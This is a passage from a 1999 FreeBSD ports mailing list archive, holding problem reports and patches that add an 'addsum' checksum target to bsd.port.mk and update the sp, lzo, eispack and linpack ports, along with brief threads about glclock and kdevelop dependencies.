(freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id D490E1526D for ; Wed, 15 Dec 1999 07:40:06 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id HAA70987; Wed, 15 Dec 1999 07:40:06 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from news.uni-kl.de (news.uni-kl.de [131.246.137.51]) by hub.freebsd.org (Postfix) with SMTP id 3DA3B15220 for ; Wed, 15 Dec 1999 07:30:58 -0800 (PST) (envelope-from naddy@unix-ag.uni-kl.de) Received: from sushi.unix-ag.uni-kl.de ( sushi.unix-ag.uni-kl.de [131.246.89.13] ) by news.uni-kl.de id aa25993 for ; 15 Dec 1999 16:33 MEZ Received: from fettuccini.unix-ag.uni-kl.de (fettuccini.unix-ag.uni-kl.de [131.246.89.27]) by sushi.unix-ag.uni-kl.de (8.9.3/8.9.1) with ESMTP id QAA24918 for ; Wed, 15 Dec 1999 16:30:48 +0100 Received: (from naddy@localhost) by fettuccini.unix-ag.uni-kl.de (8.9.3/8.9.3) id QAA44121; Wed, 15 Dec 1999 16:30:55 +0100 (CET) (envelope-from naddy) Message-Id: <199912151530.QAA44121@fettuccini.unix-ag.uni-kl.de> Date: Wed, 15 Dec 1999 16:30:55 +0100 (CET) From: Christian Weisgerber Reply-To: naddy@unix-ag.uni-kl.de To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: ports/15495: Add "addsum" target to bsd.port.mk Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15495 >Category: ports >Synopsis: Add "addsum" target to bsd.port.mk >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Wed Dec 15 07:40:00 PST 1999 >Closed-Date: >Last-Modified: >Originator: Christian Weisgerber >Release: FreeBSD 4.0-CURRENT i386 >Organization: Unix-AG, Uni Kaiserslautern >Environment: >Description: The appended patch adds an "addsum" target to bsd.port.mk. As the name implies, "addsum" puts additional checksums into files/md5 rather than overwriting it completely as "makesum" does. This is very handy in the (admittedly rather rare) case where your DISTFILES/PATCHFILES change depending on options such as NO_X11. From Marc Espie 's work on OpenBSD. >How-To-Repeat: >Fix: --- bsd.port.mk.old Wed Dec 15 16:04:52 1999 +++ bsd.port.mk Wed Dec 15 16:04:58 1999 @@ -292,6 +292,8 @@ # the same file. # checksum - Use files/md5 to ensure that your distfiles are valid. # makesum - Generate files/md5 (only do this for your own ports!). +# addsum - update files/md5 in a non-destructive way +# (your own ports only!) # # Default sequence for "all" is: fetch checksum extract patch configure build # @@ -878,8 +880,11 @@ SED?= /usr/bin/sed SETENV?= /usr/bin/env SH?= /bin/sh +SORT?= /usr/bin/sort TR?= /usr/bin/tr TRUE?= /usr/bin/true +UNIQ?= /usr/bin/uniq +WC?= /usr/bin/wc WHICH?= /usr/bin/which # Used to print all the '===>' style prompts - override this to turn them off. @@ -2118,6 +2123,24 @@ # this line goes after the ${MD5} above # echo "SIZE ($$file) = "`wc -c < $$file` >> ${MD5_FILE}; \ +.if !target(addsum) +addsum: fetch + @${MKDIR} ${FILESDIR} && ${TOUCH} ${MD5_FILE} + @(cd ${DISTDIR}; \ + for file in ${_CKSUMFILES}; do \ + ${MD5} $$file >> ${MD5_FILE}; \ + done) + @for file in ${_IGNOREFILES}; do \ + ${ECHO} "MD5 ($$file) = IGNORE" >> ${MD5_FILE}; \ + done + @${SORT} -u -o ${MD5_FILE} ${MD5_FILE} + @if [ `${SED} -e 's/\=.*$$//' ${MD5_FILE} | ${UNIQ} -d | ${WC} -l` -ne 0 ]; then \ + ${ECHO} "Inconsistent checksum in ${MD5_FILE}"; \ + exit 1; \ + else \ + ${ECHO} "${MD5_FILE} updated okay, don't forget to remove cruft"; \ + fi +.endif .if !target(checksum) checksum: >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Wed Dec 15 10:32:16 1999 Delivered-To: freebsd-ports@freebsd.org Received: from typhoon.mail.pipex.net (typhoon.mail.pipex.net [158.43.128.27]) by hub.freebsd.org (Postfix) with SMTP id 99E4115521 for ; Wed, 15 Dec 1999 10:32:06 -0800 (PST) (envelope-from mark@dogma.freebsd-uk.eu.org) Received: (qmail 9466 invoked from network); 15 Dec 1999 18:32:04 -0000 Received: from userbi56.uk.uudial.com (HELO marder-1.) (62.188.143.120) by smtp.dial.pipex.com with SMTP; 15 Dec 1999 18:32:04 -0000 Received: (from mark@localhost) by marder-1. (8.9.3/8.8.8) id SAA01689; Wed, 15 Dec 1999 18:31:59 GMT (envelope-from mark) Date: Wed, 15 Dec 1999 18:31:59 +0000 From: Mark Ovens To: Chris Piazza Cc: ports@FreeBSD.ORG Subject: Re: glclock port broken? Message-ID: <19991215183159.C325@marder-1> References: <19991214213635.D339@marder-1> <19991214153639.C722@norn.ca.eu.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0pre2i In-Reply-To: <19991214153639.C722@norn.ca.eu.org> Organization: Total lack of Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, Dec 14, 1999 at 03:36:39PM -0800, Chris Piazza wrote: > On Tue, Dec 14, 1999 at 09:36:35PM +0000, Mark Ovens wrote: > > Just tried to build glclock from the ports (ports tree cvsup'd 10 > > minutes ago) and it fails at the link stage. Can anyone tell me what's > > wrong? > > > > 3.3-STABLE (as of the end of Sept.) and XFree 3.3.5. > > > > Here's a patch to fix it. I'll commit this after the freeze. > Thanks, that's fixed it :) -- PERL has been described as "the duct tape of the Internet" and "the Unix Swiss Army chainsaw" - Computer Shopper 12/99 ________________________________________________________________ FreeBSD - The Power To Serve http://www.freebsd.org My Webpage http://ukug.uk.freebsd.org/~mark/ mailto:mark@ukug.uk.freebsd.org http://www.radan.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Wed Dec 15 11: 3:59 1999 Delivered-To: freebsd-ports@freebsd.org Received: from mail.af.airnet.ne.jp (mail.af.airnet.ne.jp [210.159.66.49]) by hub.freebsd.org (Postfix) with ESMTP id 2CC091556A for ; Wed, 15 Dec 1999 11:03:54 -0800 (PST) (envelope-from imura@cs.titech.ac.jp) Received: from imura.cs.titech.ac.jp (tok241.airnet.ne.jp [210.159.88.241]) by mail.af.airnet.ne.jp (8.8.8/3.6W/06/13/98-AF.AIRNET.NE.JP) with ESMTP id EAA15522; Thu, 16 Dec 1999 04:03:42 +0900 Posted-Date: Thu, 16 Dec 1999 03:30:58 +0900 (JST) To: ade@lovett.com Cc: freebsd-ports@FreeBSD.org Subject: Re: ports/15434: new port: devel/kdevelop From: "R. Imura" In-Reply-To: <199912150520.VAA57747@freefall.freebsd.org> References: <199912150520.VAA57747@freefall.freebsd.org> X-Mailer: Mew version 1.94b20 on Emacs 19.34 / Mule 2.3 =?iso-2022-jp?B?KBskQkt2RSYyVhsoQik=?= X-Prom-Mew: Prom-Mew 1.93.4 (procmail reader for Mew) Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit Message-Id: <19991216033056A.imura@cs.titech.ac.jp> Date: Thu, 16 Dec 1999 03:30:56 +0900 X-Dispatcher: imput version 990401(IM113) Lines: 21 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > > o The port depends on many other ports. Year, if they are installed, > > kdevelop will be more power-full and we will be happy, but they are > > not really **nessesary**. > > This port would be exceptionally well served by the optional dependencies > code that Jeremy Lea has been working on. See -ports for more details. It would be. But I meant the following optional RUN_DEPENDS. :) RUN_DEPENDS= autoconf:${PORTSDIR}/devel/autoconf \ automake:${PORTSDIR}/devel/automake \ kdbg:${PORTSDIR}/devel/kdbg \ ktranslator:${PORTSDIR}/devel/ktranslator \ glimpse:${PORTSDIR}/textproc/glimpse \ a2ps:${PORTSDIR}/print/a2ps43-letter I've forgotten to say at all that you must set LIB_DEPENDS to x11/kdelibs11. Thanks, --- R. Imura To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Wed Dec 15 11:48:39 1999 Delivered-To: freebsd-ports@freebsd.org Received: from smtp04.wxs.nl (smtp04.wxs.nl [195.121.6.59]) by hub.freebsd.org (Postfix) with ESMTP id 464B11553D; Wed, 15 Dec 1999 11:48:04 -0800 (PST) (envelope-from asmodai@wxs.nl) Received: from daemon.ninth-circle.org ([195.121.197.210]) by smtp04.wxs.nl (Netscape Messaging Server 3.61) with ESMTP id AAA3099; Wed, 15 Dec 1999 20:47:38 +0100 Received: (from asmodai@localhost) by daemon.ninth-circle.org (8.9.3/8.9.3) id UAA10643; Wed, 15 Dec 1999 20:47:32 +0100 (CET) (envelope-from asmodai) Date: Wed, 15 Dec 1999 20:47:32 +0100 From: Jeroen Ruigrok/Asmodai To: chuckr@freebsd.org Cc: ports@freebsd.org Subject: sp patch Message-ID: <19991215204732.A10636@daemon.ninth-circle.org> Mime-Version: 1.0 Content-Type: multipart/mixed; boundary="/9DWx/yDrRhgMJTb" X-Mailer: Mutt 1.0i Organisation: Ninth-Circle Enterprises Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --/9DWx/yDrRhgMJTb Content-Type: text/plain; charset=us-ascii Hey Chuck, find attached a patch to update the sp port. patch-aa can be deleted. Please verify PLIST. -- Jeroen Ruigrok van der Werven/Asmodai asmodai@[wxs.nl|bart.nl] Documentation nutter. *BSD: Technical excellence at its best... The BSD Programmer's Documentation Project Atone me to my throes curtail... --/9DWx/yDrRhgMJTb Content-Type: text/plain; charset=us-ascii Content-Disposition: attachment; filename="sp.patch" Index: ports/textproc/sp/Makefile =================================================================== RCS file: /work/FreeBSD/ncvs/ports/textproc/sp/Makefile,v retrieving revision 1.12 diff -u -r1.12 Makefile --- ports/textproc/sp/Makefile 1999/08/31 06:51:29 1.12 +++ ports/textproc/sp/Makefile 1999/12/15 18:30:24 @@ -1,12 +1,12 @@ # New ports collection makefile for: sp -# Version required: 1.2.1 +# Version required: 1.3.4 # Date created: April 26, 1997 # Whom: jfieber # # $FreeBSD: ports/textproc/sp/Makefile,v 1.12 1999/08/31 06:51:29 mharo Exp $ # -DISTNAME= sp-1.3 +DISTNAME= sp-1.3.4 CATEGORIES= textproc MASTER_SITES= ftp://ftp.jclark.com/pub/sp/ Index: ports/textproc/sp/files/md5 =================================================================== RCS file: /work/FreeBSD/ncvs/ports/textproc/sp/files/md5,v retrieving revision 1.4 diff -u -r1.4 md5 --- ports/textproc/sp/files/md5 1999/06/02 21:38:54 1.4 +++ ports/textproc/sp/files/md5 1999/12/15 18:31:19 @@ -1 +1 @@ -MD5 (sp-1.3.tar.gz) = 011bff022a23b2d23b797571fef827cf +MD5 (sp-1.3.4.tar.gz) = 61dcb5614a61bf123e1345e869eb99d4 Index: ports/textproc/sp/patches/patch-ab =================================================================== RCS file: /work/FreeBSD/ncvs/ports/textproc/sp/patches/patch-ab,v retrieving revision 1.1 diff -u -r1.1 patch-ab --- ports/textproc/sp/patches/patch-ab 1999/06/02 21:39:04 1.1 +++ ports/textproc/sp/patches/patch-ab 1999/12/15 19:09:10 @@ -1,6 +1,6 @@ ---- Makefile.orig Sun Dec 28 06:24:20 1997 -+++ Makefile Wed Jun 2 15:44:11 1999 -@@ -1,13 +1,14 @@ +--- Makefile.orig Sat Oct 10 06:15:02 1998 ++++ Makefile Wed Dec 15 20:08:38 1999 +@@ -1,13 +1,13 @@ # Copyright (c) 1994, 1995 James Clark # See the file COPYING for copying permission. @@ -10,22 +10,31 @@ # Where to install the binaries bindir=$(exec_prefix)/bin -INSTALL=cp -+libdir=$(exec_prefix)/lib +#INSTALL=cp - # You might want to change this to uncomment this on BSD systems + # You might want to uncomment this on BSD systems -#INSTALL=install +INSTALL=install -c # If you use gcc, then you must have at least version 2.6.1 and # you must use -fno-implicit-templates -@@ -46,17 +47,17 @@ +@@ -34,7 +34,8 @@ + # which doesn't appropriately define sig_atomic_t). + # Add -DJADE_MIF to include the Jade MIF backend + XDEFINES= +-DEFINES=-DSP_HAVE_BOOL -DSP_ANSI_CLASS_INST -DSP_MULTI_BYTE $(XDEFINES) ++DEFINES=-DSP_HAVE_BOOL -DSP_ANSI_CLASS_INST -DSP_MULTI_BYTE -DSP_HAVE_SOCKET \ ++ -DSP_HAVE_LOCALE $(XDEFINES) + CXXFLAGS=-ansi $(DEBUG) $(WARN) + # Flag to pass to CXX to make it output list of dependencies as a Makefile. + CXXDEPGENFLAGS=-MM +@@ -48,17 +49,17 @@ # If you defined SP_HAVE_SOCKET, add any libraries that are needed for sockets # -lsocket -lnsl needed on Solaris 2.x # -lnsl on SunOS 4.1.3 -XLIBS=#-lsocket -lnsl +XLIBS=-lgcc # -L/usr/local/lib may be needed on the RS/6000 - LIBS=$(XLIBS) + LIBS=-lm $(XLIBS) # If you're building in another directory, copy or link this Makefile # to the build directory, and set srcdir to point to the source directory. srcdir=. --/9DWx/yDrRhgMJTb-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Wed Dec 15 11:56:39 1999 Delivered-To: freebsd-ports@freebsd.org Received: from blackdawn.com (deepspace9.dcds.edu [207.231.151.2]) by hub.freebsd.org (Postfix) with ESMTP id A3B5B15503 for ; Wed, 15 Dec 1999 11:56:37 -0800 (PST) (envelope-from will@blackdawn.com) Received: (from will@localhost) by blackdawn.com (8.9.3/8.9.3) id OAA00483; Wed, 15 Dec 1999 14:56:17 -0500 (EST) (envelope-from will) Message-ID: X-Mailer: XFMail 1.4.0 on FreeBSD X-Priority: 3 (Normal) Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 8bit MIME-Version: 1.0 In-Reply-To: <19991216033056A.imura@cs.titech.ac.jp> Date: Wed, 15 Dec 1999 14:56:17 -0500 (EST) From: will andrews To: "R. Imura" Subject: Re: ports/15434: new port: devel/kdevelop Cc: freebsd-ports@FreeBSD.ORG, ade@lovett.com Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On 15-Dec-99 R. Imura wrote: >> > o The port depends on many other ports. Year, if they are installed, >> > kdevelop will be more power-full and we will be happy, but they are >> > not really **nessesary**. > > It would be. But I meant the following optional RUN_DEPENDS. :) > > RUN_DEPENDS= autoconf:${PORTSDIR}/devel/autoconf \ You're both wrong. _THIS_ must be installed for kdevelop to serve any useful purpose at all. Although the rest _are_ optional. ;-) I am still waiting to hear (valid) reasons why the kdelibs11/qt142 ports have not been upgraded. -- Will Andrews GCS/E/S @d- s+:+>+:- a--->+++ C++ UB++++ P+ L- E--- W+++ !N !o ?K w--- ?O M+ V-- PS+ PE++ Y+ PGP+>+++ t++ 5 X++ R+ tv+ b++>++++ DI+++ D+ G++>+++ e->++++ h! r-->+++ y? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Wed Dec 15 12:10:10 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 23EAE155A6 for ; Wed, 15 Dec 1999 12:10:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id MAA98336; Wed, 15 Dec 1999 12:10:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id 8A5C9155F5; Wed, 15 Dec 1999 12:03:54 -0800 (PST) Message-Id: <19991215200354.8A5C9155F5@hub.freebsd.org> Date: Wed, 15 Dec 1999 12:03:54 -0800 (PST) From: tkato@prontomail.ne.jp To: freebsd-gnats-submit@freebsd.org X-Send-Pr-Version: www-1.0 Subject: ports/15498: Update port: archivers/lzo Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15498 >Category: ports >Synopsis: Update port: archivers/lzo >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Wed Dec 15 12:10:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: KATO Tsuguru >Release: 3.3-RELEASE i386 >Organization: >Environment: >Description: * Removed unneeded lines from patches Note: As I noted before, current patches/patch-ac contains modifications made by "patch-libtool" target, which is called implicitly if USE_LIBTOOL line is in Makefile. That is, current patch avoids "patch-libtool" to work properly. >How-To-Repeat: >Fix: diff -urN /usr/ports/archivers/lzo/Makefile archivers/lzo/Makefile --- /usr/ports/archivers/lzo/Makefile Sun Dec 5 20:12:20 1999 +++ archivers/lzo/Makefile Mon Dec 6 23:05:09 1999 @@ -1,5 +1,5 @@ # New ports collection makefile for: lzo -# Version required: 1.04 +# Version required: 1.06 # Date created: 21 Feb 1998 # Whom: giffunip@asme.org # diff -urN /usr/ports/archivers/lzo/patches/patch-ac archivers/lzo/patches/patch-ac --- /usr/ports/archivers/lzo/patches/patch-ac Sun Dec 5 20:12:21 1999 +++ archivers/lzo/patches/patch-ac Sun Dec 5 12:07:37 1999 @@ -1,59 +1,5 @@ ---- configure.orig Mon Nov 29 12:37:24 1999 -+++ configure Wed Dec 1 15:35:00 1999 -@@ -1282,13 +1282,13 @@ - CFLAGS="$ac_save_CFLAGS" - elif test $ac_cv_prog_cc_g = yes; then - if test "$GCC" = yes; then -- CFLAGS="-g -O2" -+ CFLAGS="-g" - else - CFLAGS="-g" - fi - else - if test "$GCC" = yes; then -- CFLAGS="-O2" -+ CFLAGS="" - else - CFLAGS= - fi -@@ -2104,8 +2104,8 @@ - LD="$LD" LDFLAGS="$LDFLAGS" LIBS="$LIBS" \ - LN_S="$LN_S" NM="$NM" RANLIB="$RANLIB" \ - DLLTOOL="$DLLTOOL" AS="$AS" OBJDUMP="$OBJDUMP" \ --${CONFIG_SHELL-/bin/sh} $ac_aux_dir/ltconfig --no-reexec \ --$libtool_flags --no-verify $ac_aux_dir/ltmain.sh $host \ -+${CONFIG_SHELL-/bin/sh} /usr/local/share/libtool/ltconfig --no-reexec \ -+$libtool_flags --no-verify --disable-ltlibs /usr/local/share/libtool/ltmain.sh $host \ - || { echo "configure: error: libtool configure failed" 1>&2; exit 1; } - - # Reload cache, that may have been modified by ltconfig -@@ -2119,7 +2119,7 @@ - - - # This can be used to rebuild libtool when needed --LIBTOOL_DEPS="$ac_aux_dir/ltconfig $ac_aux_dir/ltmain.sh" -+LIBTOOL_DEPS="/usr/local/share/libtool/ltconfig --disable-ltlibs /usr/local/share/libtool/ltmain.sh" - - # Always use our own libtool. - LIBTOOL='$(SHELL) $(top_builddir)/libtool' -@@ -3369,7 +3369,7 @@ - - if test "$ac_cv_prog_gcc" = yes; then - mfx_save_cflags="$CFLAGS" --CFLAGS="-O2 -fschedule-insns -fschedule-insns2" -+CFLAGS="-fschedule-insns -fschedule-insns2" - echo $ac_n "checking whether ${CC-cc} suffers the -fschedule-insns bug""... $ac_c" 1>&6 - echo "configure:3375: checking whether ${CC-cc} suffers the -fschedule-insns bug" >&5 - if eval "test \"`echo '$''{'mfx_cv_prog_gcc_bug_schedule_insns'+set}'`\" = set"; then -@@ -3412,7 +3412,7 @@ - - if test "$ac_cv_prog_gcc" = yes; then - mfx_save_cflags="$CFLAGS" --CFLAGS="-O2 -fstrength-reduce" -+CFLAGS="-fstrength-reduce" - echo $ac_n "checking whether ${CC-cc} suffers the -fstrength-reduce bug""... $ac_c" 1>&6 - echo "configure:3418: checking whether ${CC-cc} suffers the -fstrength-reduce bug" >&5 - if eval "test \"`echo '$''{'mfx_cv_prog_gcc_bug_strength_reduce'+set}'`\" = set"; then +--- configure.orig Tue Nov 30 02:37:24 1999 ++++ configure Sun Dec 5 12:07:23 1999 @@ -3496,7 +3496,7 @@ if test "$enable_debug" = yes; then CFLAGS_O="-O0" >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Wed Dec 15 12:10:14 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 2190A155A8 for ; Wed, 15 Dec 1999 12:10:03 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id MAA98348; Wed, 15 Dec 1999 12:10:03 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id DADA3155F5; Wed, 15 Dec 1999 12:05:09 -0800 (PST) Message-Id: <19991215200509.DADA3155F5@hub.freebsd.org> Date: Wed, 15 Dec 1999 12:05:09 -0800 (PST) From: tkato@prontomail.ne.jp To: freebsd-gnats-submit@freebsd.org X-Send-Pr-Version: www-1.0 Subject: ports/15499: Update port: math/eispack Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15499 >Category: ports >Synopsis: Update port: math/eispack >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Wed Dec 15 12:10:02 PST 1999 >Closed-Date: >Last-Modified: >Originator: KATO Tsuguru >Release: 3.3-RELEASE i386 >Organization: >Environment: >Description: * Fixed MASTER_SITES * Moved makefile.lib to files/ * Rearrenged extract target * Added WWW: line into pkg/DESCR New file: files/makefile.lib Remove file: makefile.lib scripts/uncomp >How-To-Repeat: >Fix: diff -urN /usr/ports/math/eispack/Makefile math/eispack/Makefile --- /usr/ports/math/eispack/Makefile Wed Aug 25 19:19:31 1999 +++ math/eispack/Makefile Thu Dec 16 04:20:55 1999 @@ -1,7 +1,7 @@ -# New ports collection makefile for: eispack -# Version required: ? -# Date created: 31 October 1994 -# Whom: ljo +# New ports collection makefile for: eispack +# Version required: ? +# Date created: 31 October 1994 +# Whom: ljo # # $FreeBSD: ports/math/eispack/Makefile,v 1.22 1999/08/25 07:07:56 obrien Exp $ # @@ -9,19 +9,15 @@ DISTNAME= eispack PKGNAME= eispack-1.0 CATEGORIES= math -MASTER_SITES= ftp://netlib.bell-labs.com/netlib/eispack/ \ - ftp://www.hensa.ac.uk/mirrors/netlib/eispack/ \ - ftp://elib.zib-berlin.de/pub/netlib/eispack/ +MASTER_SITES= ftp://ftp.netlib.org/eispack/ \ + ftp://netlib.bell-labs.com/netlib/eispack/ \ + ftp://www.hensa.ac.uk/mirrors/netlib/eispack/ -DIST_SUBDIR= ${DISTNAME} +MAINTAINER= ports@FreeBSD.org LIB_DEPENDS= blas.1:${PORTSDIR}/math/blas -EXTRACT_CMD= ${SH} ${SCRIPTDIR}/uncomp -EXTRACT_SUFX= .gz -EXTRACT_BEFORE_ARGS= ${WRKDIR} -EXTRACT_AFTER_ARGS= # empty - +DIST_SUBDIR= ${DISTNAME} NO_WRKSUBDIR= yes SRCS = csroot.f epslon.f pythag.f bakvec.f balanc.f balbak.f bandr.f \ @@ -39,11 +35,16 @@ .include +do-extract: +.for flle in ${SRCS} + @${GZCAT} ${_DISTDIR}/${file:.f=.f.gz} > ${WRKSRC}/${file} +.endfor + pre-build: - ${CP} Makefile.lib ${WRKDIR}/Makefile + ${CP} ${FILESDIR}/Makefile.lib ${WRKSRC}/Makefile post-install: - ${LDCONFIG} -m ${PREFIX}/lib + ${SETENV} OBJFORMAT=${PORTOBJFORMAT} ${LDCONFIG} -m ${PREFIX}/lib .if ${PORTOBJFORMAT} == "aout" ${LN} -sf libeispack.so.1.0 ${PREFIX}/lib/libeispack.so .endif diff -urN /usr/ports/math/eispack/Makefile.lib math/eispack/Makefile.lib --- /usr/ports/math/eispack/Makefile.lib Thu Apr 3 10:14:21 1997 +++ math/eispack/Makefile.lib Thu Jan 1 09:00:00 1970 @@ -1,24 +0,0 @@ -# EISPACK sources -LIBDIR= ${PREFIX}/lib -NOPROFILE= no - -SHLIB_MAJOR= 1 -SHLIB_MINOR= 0 - -# removed otqlrat.f from the SRCS list, only one tqlrat routine can -# be used in a library. -# ATS -LIB=eispack -SRCS = csroot.f epslon.f pythag.f bakvec.f balanc.f balbak.f bandr.f \ - bandv.f bisect.f bqr.f cbabk2.f cbal.f cg.f ch.f cinvit.f combak.f \ - comhes.f comlr.f comlr2.f comqr.f comqr2.f cortb.f corth.f elmbak.f \ - elmhes.f eltran.f figi.f figi2.f hqr.f hqr2.f htrib3.f htribk.f \ - htrid3.f htridi.f imtql1.f imtql2.f imtqlv.f invit.f minfit.f \ - ortbak.f orthes.f ortran.f qzhes.f qzit.f qzval.f qzvec.f \ - ratqr.f rebak.f rebakb.f reduc.f reduc2.f rg.f rgg.f rs.f rsb.f \ - rsg.f rsgab.f rsgba.f rsm.f rsp.f rst.f rt.f svd.f tinvit.f tql1.f \ - tql2.f tqlrat.f trbak1.f trbak3.f tred1.f tred2.f tred3.f tridib.f \ - tsturm.f cdiv.f -CLEANFILES+= *.c - -.include diff -urN /usr/ports/math/eispack/files/Makefile.lib math/eispack/files/Makefile.lib --- /usr/ports/math/eispack/files/Makefile.lib Thu Jan 1 09:00:00 1970 +++ math/eispack/files/Makefile.lib Thu Dec 16 01:51:09 1999 @@ -0,0 +1,24 @@ +# EISPACK sources +LIBDIR= ${PREFIX}/lib +NOPROFILE= no + +SHLIB_MAJOR= 1 +SHLIB_MINOR= 0 + +# removed otqlrat.f from the SRCS list, only one tqlrat routine can +# be used in a library. +# ATS +LIB=eispack +SRCS = csroot.f epslon.f pythag.f bakvec.f balanc.f balbak.f bandr.f \ + bandv.f bisect.f bqr.f cbabk2.f cbal.f cg.f ch.f cinvit.f combak.f \ + comhes.f comlr.f comlr2.f comqr.f comqr2.f cortb.f corth.f elmbak.f \ + elmhes.f eltran.f figi.f figi2.f hqr.f hqr2.f htrib3.f htribk.f \ + htrid3.f htridi.f imtql1.f imtql2.f imtqlv.f invit.f minfit.f \ + ortbak.f orthes.f ortran.f qzhes.f qzit.f qzval.f qzvec.f \ + ratqr.f rebak.f rebakb.f reduc.f reduc2.f rg.f rgg.f rs.f rsb.f \ + rsg.f rsgab.f rsgba.f rsm.f rsp.f rst.f rt.f svd.f tinvit.f tql1.f \ + tql2.f tqlrat.f trbak1.f trbak3.f tred1.f tred2.f tred3.f tridib.f \ + tsturm.f cdiv.f +CLEANFILES+= *.c + +.include diff -urN /usr/ports/math/eispack/pkg/DESCR math/eispack/pkg/DESCR --- /usr/ports/math/eispack/pkg/DESCR Mon Oct 31 23:33:50 1994 +++ math/eispack/pkg/DESCR Thu Dec 16 01:55:06 1999 @@ -13,3 +13,5 @@ As the package is in FORTRAN there are no include files for the library, and the only thing to install is the library itself. + +WWW: http://www.netlib.org/eispack/ diff -urN /usr/ports/math/eispack/scripts/uncomp math/eispack/scripts/uncomp --- /usr/ports/math/eispack/scripts/uncomp Wed Jul 8 07:41:55 1998 +++ math/eispack/scripts/uncomp Thu Jan 1 09:00:00 1970 @@ -1,6 +0,0 @@ -#!/bin/sh -outdir=$1 -infile=$2 -outfile=`basename $infile .gz` -echo Uncompressing $infile to $outdir/$outfile -gzcat $infile > $outdir/$outfile >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Wed Dec 15 12:10:16 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 9F58915646 for ; Wed, 15 Dec 1999 12:10:03 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id MAA98358; Wed, 15 Dec 1999 12:10:03 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id 131CE15601; Wed, 15 Dec 1999 12:06:12 -0800 (PST) Message-Id: <19991215200612.131CE15601@hub.freebsd.org> Date: Wed, 15 Dec 1999 12:06:12 -0800 (PST) From: tkato@prontomail.ne.jp To: freebsd-gnats-submit@freebsd.org X-Send-Pr-Version: www-1.0 Subject: ports/15500: Update port: math/linpack Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15500 >Category: ports >Synopsis: Update port: math/linpack >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Wed Dec 15 12:10:03 PST 1999 >Closed-Date: >Last-Modified: >Originator: KATO Tsuguru >Release: 3.3-RELEASE i386 >Organization: >Environment: >Description: * Added secondary sites to MASTER_SITES * Rearrenged extract target * Added WWW: line into pkg/DESCR Remove file: scripts/uncomp >How-To-Repeat: >Fix: diff -urN /usr/ports/math/linpack/Makefile math/linpack/Makefile --- /usr/ports/math/linpack/Makefile Sun Sep 26 07:16:42 1999 +++ math/linpack/Makefile Thu Dec 16 04:21:14 1999 @@ -1,7 +1,7 @@ -# New ports collection makefile for: linpack -# Version required: ? -# Date created: 31 October 1994 -# Whom: ljo +# New ports collection makefile for: linpack +# Version required: ? +# Date created: 31 October 1994 +# Whom: ljo # # 